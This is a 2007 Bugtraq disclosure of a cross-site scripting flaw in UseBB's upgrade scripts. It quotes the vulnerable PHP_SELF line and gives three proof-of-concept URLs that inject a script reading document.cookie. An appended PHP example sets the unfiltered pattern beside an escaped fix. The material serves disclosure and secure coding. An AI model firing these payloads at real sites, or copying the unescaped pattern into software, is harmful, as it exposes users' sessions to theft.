UseBB 1.0.x Cross Site Scripting (XSS)


Date: 20 Jul 2007 19:54:36 -0000
From: s4mi@LinuxMail.org
To: bugtraq@securityfocus.com
Subject: UseBB 1.0.x  Cross Site Scripting (XSS)
X-Virus-Scanned: antivirus-gw at tyumen.ru

#############################################################
#	Script...............: UseBB version: 1.0.7	    #
#	Script Site..........: http://www.usebb.net	    #
#	Vulnerability........: Cross Site Scripting (XSS)   #
#	Access...............: Remote			    #
#	level................: Dangerous		    #
#	Author...............: S4mi			    #
#	Contact..............: s4mi[at]LinuxMail.org	    #
#############################################################

The affected files:

/UseBB/install/upgrade-0-2-3.php
/UseBB/install/upgrade-0-3.php
/UseBB/install/upgrade-0-4.php

Vuln code: line ~ 86

return '<form action="'.$_SERVER['PHP_SELF'].'" method="post"><p><input type="hidden" name="step" value="'.$step.'" /><input type="submit" value="' . ( ( $_POST['step'] == $step ) ? 'Retry step '.$step : 'Continue to step '.$step ) . '" /></p></form>';

The variable PHP_SELF is used without filtering.

PoC:

http://127.0.0.1/UseBB/install/upgrade-0-2-3.php/"><ScRiPt>alert(document.cookie);</ScRiPt>
http://127.0.0.1/UseBB/install/upgrade-0-3.php/"><ScRiPt>alert(document.cookie);</ScRiPt>
http://127.0.0.1/UseBB/install/upgrade-0-4.php/"><ScRiPt>alert(document.cookie);</ScRiPt>

Solution:

Filter PHP_SELF, or, you know what's best, lol: delete the install directory :D

Shoutz:

Simo64, DrackaNz, Iss4m, Coder212, HarDose, r0_0t, ddx39, E.chark, Nuck3r ....... & all Others
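
The filtering that the Solution line asks for, shown beside the unfiltered pattern. This is an added example, not code from UseBB or from the original post; the function names and the sample request array are constructed for illustration, and it assumes PHP 7 or later.

```php
<?php
// Added example, not UseBB's code. Function names and the request are constructed.

// Escape a value for use inside a double-quoted HTML attribute.
function attr(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Pattern from the advisory: PHP_SELF is concatenated into action="" as-is.
function step_form_unfiltered(array $server, array $post, int $step): string
{
    $label = (($post['step'] ?? null) == $step) ? 'Retry step ' : 'Continue to step ';
    return '<form action="' . $server['PHP_SELF'] . '" method="post"><p>'
        . '<input type="hidden" name="step" value="' . $step . '" />'
        . '<input type="submit" value="' . $label . $step . '" /></p></form>';
}

// Hardened: SCRIPT_NAME carries no trailing PATH_INFO, and every dynamic
// value is still escaped for the attribute context before output.
function step_form_escaped(array $server, array $post, int $step): string
{
    $label = ((int) ($post['step'] ?? 0) === $step) ? 'Retry step ' : 'Continue to step ';
    return '<form action="' . attr($server['SCRIPT_NAME']) . '" method="post"><p>'
        . '<input type="hidden" name="step" value="' . attr((string) $step) . '" />'
        . '<input type="submit" value="' . attr($label . $step) . '" /></p></form>';
}

// Constructed request matching the advisory's PoC URL shape: PHP appends the
// extra path after the script name to PHP_SELF.
$script = '/UseBB/install/upgrade-0-3.php';
$server = [
    'SCRIPT_NAME' => $script,
    'PHP_SELF'    => $script . '/"><ScRiPt>alert(document.cookie);</ScRiPt>',
];

$unfiltered = step_form_unfiltered($server, [], 2);
$escaped    = step_form_escaped($server, [], 2);
// Same input through the escaper alone, for code that must keep PHP_SELF.
$selfEscaped = attr($server['PHP_SELF']);

foreach (['unfiltered' => $unfiltered, 'escaped' => $escaped, 'attr(PHP_SELF)' => $selfEscaped] as $name => $html) {
    $raw = stripos($html, '<script') !== false;
    printf("%-15s raw <script> tag in output: %s\n", $name, $raw ? 'yes' : 'no');
}
```

The same escaping applies to any other place the upgrade scripts echo request-derived values; removing the install directory after setup takes these files out of reach entirely.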
